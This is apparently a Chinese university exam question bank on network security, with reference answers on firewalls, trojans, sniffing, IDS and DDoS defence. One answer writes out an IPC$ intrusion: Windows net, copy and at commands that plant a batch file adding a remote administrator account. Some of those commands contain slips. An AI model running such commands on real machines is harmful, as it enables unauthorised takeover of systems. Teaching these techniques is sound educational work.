大學(xué)試題(計(jì)算機(jī)科學(xué))-網(wǎng)絡(luò)安全技術(shù)筆試（2018-2023年）真題摘選含答案

長風(fēng)破浪會(huì)有時(shí)，直掛云帆濟(jì)滄海。大學(xué)試題(計(jì)算機(jī)科學(xué))-網(wǎng)絡(luò)安全技術(shù)筆試（2018-2023年）真題摘選含答案（圖片大小可自由調(diào)整）卷I一.參考題庫(共30題)1.信息安全目標(biāo)CIA中A指的是可用性。2.黑客分為多種，（）的原則是“誰給錢多給誰干”。A、破壞者B、紅客C、間諜D、駭客3.竊聽是一種（）攻擊，攻擊者（）將自己的系統(tǒng)插入到發(fā)送站和接收站之間。截獲是一種（）攻擊，攻擊者（）將自己的系統(tǒng)插入到發(fā)送站和接受站之間。A、被動(dòng)；無須；主動(dòng)；必須B、主動(dòng)；必須；被動(dòng)；無須C、主動(dòng)；無須；被動(dòng)；必須D、被動(dòng)；必須；主動(dòng)；無須4.在以下人為的惡意攻擊中，屬于主動(dòng)攻擊的是（）。A、身份假冒B、數(shù)據(jù)竊聽C、數(shù)據(jù)流分析D、非法訪問5.計(jì)算機(jī)病毒按按入侵的途徑分為（）4種。6.屏蔽路由器型防火墻采用的技術(shù)是基于（）。A、數(shù)據(jù)包過濾技術(shù)B、應(yīng)用網(wǎng)關(guān)技術(shù)C、代理服務(wù)技術(shù)D、三種技術(shù)的結(jié)合7.PGP加密技術(shù)是一個(gè)基于DES對(duì)稱密鑰體系的郵件加密軟件。8.用IPC$入侵方法在遠(yuǎn)程主機(jī)192.168.11.1上建立一個(gè)帳號(hào)為STU2，并加入administrators過程。9.使用防病毒軟件時(shí)，一般要求用戶每隔2周進(jìn)行升級(jí)，這樣做的目的是（）。A、對(duì)付最新的病毒，因此需要下載最新的程序B、程序中有錯(cuò)誤，所以要不斷升級(jí)，消除程序中的BUGC、新的病毒在不斷出現(xiàn)，因此需要用及時(shí)更新病毒的特征碼資料庫D、以上說法的都不對(duì)10.在遠(yuǎn)程機(jī)器192.168.1.23上把帳號(hào)stu加入administrators組的net完整命令是（）。11.會(huì)話層的主要功能是允許不同機(jī)器上用戶之間建立會(huì)話關(guān)系。12.防火墻不能防止來自網(wǎng)絡(luò)內(nèi)部的攻擊。13.計(jì)算機(jī)病毒按破壞的程度分：可分為（）和（）。14.下面（）不是網(wǎng)絡(luò)端口掃描工具。A、SuperscanB、HostScanC、X-ScannerD、SnifferPRO15.說一說重點(diǎn)對(duì)付DDoS攻擊的一些常規(guī)的網(wǎng)絡(luò)攻擊防范的方法？16.什么是網(wǎng)絡(luò)嗅探？17.一般木馬程序包括（）和（）兩個(gè)程序。18.掃描的主要技術(shù)有：（）。19.請(qǐng)解釋5種“非法訪問”攻擊方式的含義。20.口令破解的方法有很多，最為常見的有（）和暴力破解。21.計(jì)算機(jī)網(wǎng)絡(luò)安全的目的什么？22.保證操作系統(tǒng)的安全是網(wǎng)管的第一要?jiǎng)?wù)，通過（）可以針對(duì)Windows操作系統(tǒng)進(jìn)行有效的安全加固，從而為其他應(yīng)用構(gòu)筑最基礎(chǔ)的安全平臺(tái)。A、使用強(qiáng)壯的密碼，不使用諸如生日、電話號(hào)碼等易被猜測(cè)的口令B、定時(shí)安裝系統(tǒng)補(bǔ)丁，及時(shí)修補(bǔ)操作系統(tǒng)的漏洞C、只啟必需的服務(wù)，關(guān)閉不必要的服務(wù)和端口D、安裝防火墻和入侵檢測(cè)系統(tǒng)23.網(wǎng)絡(luò)監(jiān)聽的手段是截獲通信的內(nèi)容，監(jiān)聽的目的是對(duì)協(xié)議進(jìn)行分析。24.直接利用ping工具發(fā)送超大的ping數(shù)據(jù)包，這種攻擊稱為PingofDeath。25.用戶收到了一封可疑的電子郵件，要求用戶提供銀行賬戶及密碼，這是屬于何種攻擊手段？（）A、緩存溢出攻擊B、釣魚攻擊C、暗門攻擊D、DDOS攻擊26.目前，VPN使用了（）技術(shù)保證了通信的安全性。A、隧道協(xié)議、身份認(rèn)證和數(shù)據(jù)加密B、身份認(rèn)證、數(shù)據(jù)加密C、隧道協(xié)議、身份認(rèn)證D、隧道協(xié)議、數(shù)據(jù)加密27.在校園的局域網(wǎng)中捕獲到一個(gè)以太網(wǎng)幀，此幀的全部數(shù)據(jù)如下圖所示. 此幀的用途和目的是什么？28.入侵檢測(cè)系統(tǒng)從分析方式上主要可分為兩種：（）。29.一般認(rèn)為蠕蟲是一種通過網(wǎng)絡(luò)傳播的惡性病毒，它具有病毒的一切共性，如傳播性、隱蔽性、破壞性等。30.代理服務(wù)作為防火墻技術(shù)主要在OSI的哪一層實(shí)現(xiàn)（）。A、數(shù)據(jù)鏈路層B、網(wǎng)絡(luò)層C、表示層D、應(yīng)用層卷I參考答案一.參考題庫1.參考答案:正確2.參考答案:C3.參考答案:A4.參考答案:A5.參考答案:源碼型病毒、入侵型病毒、操作系統(tǒng)型病毒、外殼型病毒6.參考答案:B7.參考答案:錯(cuò)誤8.參考答案: ①、netuse//192.168.11.1/ipc$“password”/user:”admin” ②、建立文件hacker.bat，其內(nèi)容： netusers1123/add netlocalgroupadministratorsstu/add ③、copyhacker.bat//192.169.11.1/c$ ④、nettime//192.168.11.1(取得時(shí)間t) ⑤、at//192.168.11.1t+3c:/hacker.bat9.參考答案:C10.參考答案:Netlocalgroupadministratorsstu/add11.參考答案:正確12.參考答案:正確13.參考答案:良性病毒；惡性病毒14.參考答案:D15.參考答案:定期掃描，在骨干節(jié)點(diǎn)配置防火墻，用足夠的機(jī)器承受黑客攻擊，充分利用網(wǎng)絡(luò)設(shè)備保護(hù)網(wǎng)絡(luò)資源，過濾不必要的服務(wù)和端口，檢查訪問者的來源，限制SYN/ICMP流量等。16.參考答案: 嗅探（Sniffer）技術(shù)是網(wǎng)絡(luò)安全檢測(cè)技術(shù)中很重要的一種，它是一種可以捕獲網(wǎng)絡(luò)報(bào)文的軟件工具或者設(shè)備，網(wǎng)絡(luò)安全管理人員會(huì)經(jīng)常借助此類工具對(duì)網(wǎng)絡(luò)的各種活動(dòng)進(jìn)行實(shí)時(shí)監(jiān)測(cè)，發(fā)現(xiàn)網(wǎng)絡(luò)中的攻擊行為。與主動(dòng)掃描相比，嗅探的行為更難察覺，因此，黑客也會(huì)利用具有很強(qiáng)非常隱蔽性的嗅探技術(shù)攫取網(wǎng)絡(luò)中的敏感信息。17.參考答案:服務(wù)器端；客戶端18.參考答案:存活性掃描、端口掃描、服務(wù)識(shí)別、操作系統(tǒng)識(shí)別19.參考答案: 1）口令破解 攻擊者可以通過獲取口令文件然后運(yùn)用口令破解工具進(jìn)行字典攻擊或暴力攻擊來獲得口令，也可通過猜測(cè)或竊聽等方式獲取口令，從而進(jìn)入系統(tǒng)進(jìn)行非法訪問，選擇安全的口令非常重要。這也是黑客入侵中真正攻擊方式的一種。 2）IP欺騙 攻擊者可通過偽裝成被信任源IP地址等方式來騙取目標(biāo)主機(jī)的信任，這主要針對(duì)LinuxUNIX下建立起IP地址信任關(guān)系的主機(jī)實(shí)施欺騙。這也是黑客入侵中真正攻擊方式的一種。 3）DNS欺騙 當(dāng)DNS服務(wù)器向另一個(gè)DNS服務(wù)器發(fā)送某個(gè)解析請(qǐng)求（由域名解析出IP地址）時(shí)，因?yàn)椴贿M(jìn)行身份驗(yàn)證，這樣黑客就可以冒充被請(qǐng)求方，向請(qǐng)求方返回一個(gè)被篡改了的應(yīng)答（IP地址），將用戶引向黑客設(shè)定的主機(jī)。這也是黑客入侵中真正攻擊方式的一種。 4）重放（Replay）攻擊 在消息沒有時(shí)間戳的情況下，攻擊者利用身份認(rèn)證機(jī)制中的漏洞先把別人有用的消息記錄下來，過一段時(shí)間后再發(fā)送出去。 5）特洛伊木馬（TrojanHorse） 把一個(gè)能幫助黑客完成某一特定動(dòng)作的程序依附在某一合法用戶的正常程序中，而一旦用戶觸發(fā)正常程序，黑客代碼同時(shí)被激活，這些代碼往往能完成黑客早已指定的任務(wù)（如監(jiān)聽某個(gè)不常用端口，假冒登錄界面獲取帳號(hào)和口令等）。20.參考答案:猜解簡單口令、字典破解21.參考答案:計(jì)算機(jī)網(wǎng)絡(luò)安全的目的簡單地說就是要充分利用現(xiàn)有的各種網(wǎng)絡(luò)安全技術(shù)手段使計(jì)算機(jī)網(wǎng)絡(luò)的使用者獲得良好的網(wǎng)絡(luò)安全使用環(huán)境。22.參考答案:A,B,C23.參考答案:錯(cuò)誤24.參考答案:正確25.參考答案:B26.參考答案:A27.參考答案: 地址解析協(xié)議的ARP查詢。28.參考答案:模式發(fā)現(xiàn)技術(shù)（模式匹配）、異常發(fā)現(xiàn)技術(shù)（異常檢測(cè)）29.參考答案:正確30.參考答案:D卷II一.參考題庫(共30題)1.說一說木馬的防治方法？2.加密技術(shù)不能實(shí)現(xiàn)（）。A、數(shù)據(jù)信息的完整性B、基于密碼技術(shù)的身份認(rèn)證C、機(jī)密文件加密D、基于IP的頭信息的包過濾3.交換機(jī)是企業(yè)局域網(wǎng)絡(luò)正常運(yùn)行的關(guān)鍵設(shè)備，作為一名網(wǎng)管需要采?。ǎ┑陌踩芾泶胧┎拍鼙ＷC企業(yè)網(wǎng)用戶正常的網(wǎng)絡(luò)通信。A、通過VLAN把局域網(wǎng)分段管理B、設(shè)置難度較高的管理口令C、連接到路由器上D、將多臺(tái)交換機(jī)疊加起來使用4.在校園的局域網(wǎng)中捕獲到一個(gè)以太網(wǎng)幀，此幀的全部數(shù)據(jù)如下圖所示. 它的目的IP地址是（），它屬于（）地址。5.命令netusez://192.168.11.6/c$成功執(zhí)行的結(jié)果是什么？6.下圖是一臺(tái)計(jì)算機(jī)訪問一個(gè)Web網(wǎng)站時(shí)SNIFFER獲取的數(shù)據(jù)包序列。 Web服務(wù)器的IP地址是（），它屬于（）地址。7.電路級(jí)網(wǎng)關(guān)是以下哪一種軟/硬件的類型？（）A、防火墻B、入侵檢測(cè)軟件C、端口D、商業(yè)支付程序8.什么是流氓軟件？9.加密在網(wǎng)絡(luò)上的作用就是防止有價(jià)值的信息在網(wǎng)上被（）。A、攔截和破壞B、攔截和竊取C、篡改和損壞D、篡改和竊取10.簡述木馬攻擊的過程.11.在以下認(rèn)證方式中，最常用的認(rèn)證方式是：（）A、基于賬戶名／口令認(rèn)證B、基于摘要算法認(rèn)證C、基于PKI認(rèn)證D、基于數(shù)據(jù)庫認(rèn)證12.密鑰生成形式有兩種：一種是由（）生成，另一種是由個(gè)人分散生成。13.注冊(cè)表中DWORD數(shù)據(jù)類型的長度為（）個(gè)字節(jié)。14.下面（）不是網(wǎng)絡(luò)攻擊的防范方法。A、定期掃描B、配置防火墻C、機(jī)器冗余D、流量均衡15.刪除賬號(hào)stu的命令是（）（密碼是123）。A、netuser123stuB、netuser123stu/delC、netuse123stu/delD、netuserstu123/del16.木馬是一種可以駐留在對(duì)方客戶端系統(tǒng)中的一種程序。17.Hash函數(shù)是可接受（）數(shù)據(jù)輸入，并生成定長數(shù)據(jù)輸出的函數(shù)。18.在校園的局域網(wǎng)中捕獲到一個(gè)以太網(wǎng)幀，此幀的全部數(shù)據(jù)如下圖所示. 它的源IP地址是（），它屬于（）IP地址。19.入侵防護(hù)系統(tǒng)（IPS）傾向于提供主動(dòng)防護(hù)，其設(shè)計(jì)宗旨是預(yù)先對(duì)入侵活動(dòng)和攻擊性網(wǎng)絡(luò)流量進(jìn)行攔截，避免其造成損失，而不是簡單地在惡意流量傳送時(shí)或傳送后才發(fā)出警報(bào)。20.一個(gè)完備的入侵檢測(cè)系統(tǒng)IDS一定是基于主機(jī)和基于網(wǎng)絡(luò)兩種方式兼?zhèn)涞姆植际较到y(tǒng)。21.什么是IDS，它有哪些基本功能？22.包過濾防火墻中的包過濾器一般安裝在（），工作在網(wǎng)絡(luò)的第三層。23.在OSI七個(gè)層次的基礎(chǔ)上，將安全體系劃分為四個(gè)級(jí)別，以下哪一個(gè)不屬于四個(gè)級(jí)別（）。A、網(wǎng)絡(luò)級(jí)安全B、系統(tǒng)級(jí)安全C、應(yīng)用級(jí)安全D、鏈路級(jí)安全24.下面關(guān)于口令的安全描述中錯(cuò)誤的是（）`。A、口令要定期更換B、口令越長越安全C、容易記憶的口令不安全D、口令中使25.“流氓軟件”通俗的講是指那些在人們使用電腦上網(wǎng)時(shí)，產(chǎn)生不受人控制，不斷跳出的與用戶打開的網(wǎng)頁不相干的奇怪畫面，或者是做各種廣告的軟件。26.計(jì)算機(jī)病毒是計(jì)算機(jī)系統(tǒng)中自動(dòng)產(chǎn)生的。27.在OSI參考模型中，（）是完成網(wǎng)絡(luò)中主機(jī)間的報(bào)文傳輸。A、應(yīng)用層B、網(wǎng)絡(luò)層C、傳輸層D、數(shù)據(jù)鏈路層28.解釋反彈技術(shù)29.網(wǎng)絡(luò)監(jiān)聽是網(wǎng)絡(luò)管理員的工作，監(jiān)聽的內(nèi)容是網(wǎng)絡(luò)信息的流動(dòng)，監(jiān)聽的工具是（），監(jiān)聽最好的地方是（）、網(wǎng)關(guān)與防火墻。30.說一說網(wǎng)絡(luò)嗅探的檢測(cè)方法？卷II參考答案一.參考題庫1.參考答案: ①安裝反病毒軟件。時(shí)刻打開殺毒軟件，大多數(shù)反病毒工具軟件幾乎都可檢測(cè)到所有的特洛伊木馬，但值得注意的是，應(yīng)及時(shí)更新反病毒軟件。 ②安裝特洛伊木馬刪除軟件。反病毒軟件雖然能查出木馬，但卻不能將它從計(jì)算機(jī)上刪除。為此必須安裝諸如TROJIAREMOVER之類的軟件。 ③建立個(gè)人防火墻。當(dāng)木馬進(jìn)入計(jì)算機(jī)時(shí)，防火墻可以對(duì)你進(jìn)行有效保護(hù)。 ④不要執(zhí)行來歷不明的軟件和程序。木馬的服務(wù)端程序只有在被執(zhí)行后才會(huì)生效。通過網(wǎng)絡(luò)下載的文件，QQ或MSN傳輸?shù)奈募?，以及從別人那拷貝來的文件，對(duì)電子郵件附件在沒有十足把握的情況下，千萬不要將它打開。最好是在運(yùn)行它之前，先用反病毒軟件對(duì)它進(jìn)行檢查。2.參考答案:D3.參考答案:A,B4.參考答案:10.0.26.1；單播5.參考答案:該命令的成功執(zhí)行結(jié)果是在本地機(jī)器上多出一個(gè)盤符Z，Z盤實(shí)質(zhì)上就是遠(yuǎn)程機(jī)器的C盤，在本地對(duì)Z盤的操作就等于對(duì)遠(yuǎn)程機(jī)器C盤的操作。6.參考答案:202.203.208.32；公網(wǎng)7.參考答案:A8.參考答案:“流氓軟件”通俗的講是指那些在人們使用電腦上網(wǎng)時(shí)，產(chǎn)生不受人控制，不斷跳出的與用戶打開的網(wǎng)頁不相干的奇怪畫面，或者是做各種廣告的軟件?！傲髅ボ浖笔侵附橛诓《竞驼?guī)軟件之間的一類軟件。9.參考答案:B10.參考答案: ①配置生成服務(wù)端 ②種植木馬 ③上線，一般由主動(dòng)和自動(dòng)上線兩種 ④控制操作，實(shí)現(xiàn)攻擊者的意圖11.參考答案:A12.參考答案:中心集中13.參考答案:414.參考答案:D15.參考答案:B16.參考答案:錯(cuò)誤17.參考答案:變長18.參考答案:10.0.26.12；私網(wǎng)19.參考答案:正確20.參考答案:正確21.參考答案: 入侵檢測(cè)系統(tǒng)IDS，它從計(jì)算機(jī)網(wǎng)絡(luò)系統(tǒng)中的若干關(guān)鍵點(diǎn)收集信息，并分析這些信息，檢查網(wǎng)絡(luò)中是否有違反安全策略的行為和遭到襲擊的跡象。入侵檢測(cè)被認(rèn)為是防火墻之后的第二道安全閘門。 1）監(jiān)測(cè)并分析用戶和系統(tǒng)的活動(dòng)，查找非法用戶和合法用戶的越權(quán)操作； 2）核查系統(tǒng)配置和漏洞并提示管理員修補(bǔ)漏洞； 3）評(píng)估系統(tǒng)關(guān)鍵資源和數(shù)據(jù)文件的完整性； 4）識(shí)別已知的攻擊行為，統(tǒng)計(jì)